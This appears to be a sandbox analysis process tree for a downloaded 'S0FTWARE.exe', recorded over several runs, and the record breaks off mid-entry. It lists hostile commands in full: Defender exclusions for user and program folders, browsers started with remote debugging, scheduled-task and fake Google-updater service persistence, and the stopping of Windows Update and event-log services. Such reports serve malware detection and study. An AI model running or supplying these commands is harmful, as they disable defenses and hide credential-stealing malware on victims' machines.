  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4848
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:1984
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:2696
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:2024
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:1848
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:2148
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:2660
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:1776
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:2268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:3664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4180
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:3788
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:2336
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WJYZS'"
  2⤵
  PID:5076
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WJYZS'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2476
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
  2⤵
  PID:1352
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData'"
  2⤵
  PID:3300
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1216
- C:\WJYZS\bitohopad.exe
  "C:\WJYZS\bitohopad.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3136
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    PID:1368
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7fffd864cc40,0x7fffd864cc4c,0x7fffd864cc58
      4⤵
      PID:1904
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1900,i,8014329595294666301,1064549289770971131,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1896 /prefetch:2
      4⤵
      PID:2460
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2088,i,8014329595294666301,1064549289770971131,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2020 /prefetch:3
      4⤵
      PID:2296
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2292,i,8014329595294666301,1064549289770971131,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2308 /prefetch:8
      4⤵
      PID:3176
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3208,i,8014329595294666301,1064549289770971131,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3220 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:5180
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3340,i,8014329595294666301,1064549289770971131,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3244 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:5188
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3660,i,8014329595294666301,1064549289770971131,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4504 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:5908
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4724,i,8014329595294666301,1064549289770971131,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4528 /prefetch:8
      4⤵
      PID:5932
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4696,i,8014329595294666301,1064549289770971131,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4756 /prefetch:8
      4⤵
      PID:5940
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4848,i,8014329595294666301,1064549289770971131,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4844 /prefetch:8
      4⤵
      PID:5668
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    PID:6008
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fffe7b546f8,0x7fffe7b54708,0x7fffe7b54718
      4⤵
      PID:2476
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1452,10614893460203656313,9537322353180172788,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:2
      4⤵
      PID:5968
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1452,10614893460203656313,9537322353180172788,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3
      4⤵
      PID:4788
- C:\WJYZS\beptiakdfg.exe
  "C:\WJYZS\beptiakdfg.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4208
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4560
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /tn MyApp /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:1864
- C:\WJYZS\bntiasklda.exe
  "C:\WJYZS\bntiasklda.exe"
  2⤵
  PID:1776
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:5656
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:5796
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:4428
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:5368
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1248
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop bits
    3⤵
    - Launches sc.exe
    PID:2132
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop dosvc
    3⤵
    - Launches sc.exe
    PID:5220
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    PID:5328
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    PID:5768
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    PID:6076
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:3744
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineK"
    3⤵
    - Launches sc.exe
    PID:5756
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineK" binpath= "C:\ProgramData\GoogleUP\Chrome\Updater.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:5792
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:5408
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineK"
    3⤵
    - Launches sc.exe
    PID:1408

C:\Users\Admin\Downloads\S0FTWARE\S0FTWARE.exe
"C:\Users\Admin\Downloads\S0FTWARE\S0FTWARE.exe"
1⤵
- Downloads MZ/PE file
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
PID:2344
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:2112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:1732
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:412
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:1976
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:2892
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:2296
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4468
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:3492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:5084
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:2124
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4956
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4472
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\CWURE'"
  2⤵
  PID:1068
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\CWURE'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4128
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
  2⤵
  PID:8
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3632
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData'"
  2⤵
  PID:1776
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4040
- C:\CWURE\bitohopad.exe
  "C:\CWURE\bitohopad.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2660
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    PID:5596
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fffd864cc40,0x7fffd864cc4c,0x7fffd864cc58
      4⤵
      PID:5684
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    PID:5404
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fffd864cc40,0x7fffd864cc4c,0x7fffd864cc58
      4⤵
      PID:5264
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2284,i,5857041554247270779,3917338721951489938,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2280 /prefetch:2
      4⤵
      PID:5640
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1792,i,5857041554247270779,3917338721951489938,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2332 /prefetch:3
      4⤵
      PID:1776
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2012,i,5857041554247270779,3917338721951489938,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2448 /prefetch:8
      4⤵
      PID:2956
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3200,i,5857041554247270779,3917338721951489938,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3208 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:5248
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3212,i,5857041554247270779,3917338721951489938,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3268 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:5300
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3040,i,5857041554247270779,3917338721951489938,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4528 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:2444
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3196,i,5857041554247270779,3917338721951489938,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4712 /prefetch:8
      4⤵
      PID:3496
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4872,i,5857041554247270779,3917338721951489938,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4860 /prefetch:8
      4⤵
      PID:5840
- C:\CWURE\beptiakdfg.exe
  "C:\CWURE\beptiakdfg.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3788
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
    3⤵
    PID:4616
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /tn MyApp /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4256
- C:\CWURE\bntiasklda.exe
  "C:\CWURE\bntiasklda.exe"
  2⤵
  PID:3936

C:\Users\Admin\Downloads\S0FTWARE\S0FTWARE.exe
"C:\Users\Admin\Downloads\S0FTWARE\S0FTWARE.exe"
1⤵
- Executes dropped EXE
PID:2812
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:2580
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4728
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:1848
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4124
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:3648
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:1232
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:2624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:1316
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:3512
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:2904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WQBFV'"
  2⤵
  PID:5200
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WQBFV'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5380
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
  2⤵
  PID:5544
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData'"
  2⤵
  PID:5716
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5752
- C:\WQBFV\bitohopad.exe
  "C:\WQBFV\bitohopad.exe"
  2⤵
  PID:5332
- C:\WQBFV\beptiakdfg.exe
  "C:\WQBFV\beptiakdfg.exe"
  2⤵
  PID:5676
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
    3⤵
    PID:5564
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /tn MyApp /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:5884
- C:\WQBFV\bntiasklda.exe
  "C:\WQBFV\bntiasklda.exe"
  2⤵
  PID:5736

C:\Users\Admin\Downloads\S0FTWARE\S0FTWARE.exe
"C:\Users\Admin\Downloads\S0FTWARE\S0FTWARE.exe"
1⤵
PID:1240
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:3708
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:2576
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:5408
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:5520
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:5640
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:5696
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\GNADR'"
  2⤵
  PID:5344
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\GNADR'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5460
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
  2⤵
  PID:5900
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData'"
  2⤵
  PID:6136
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData'"
    3⤵
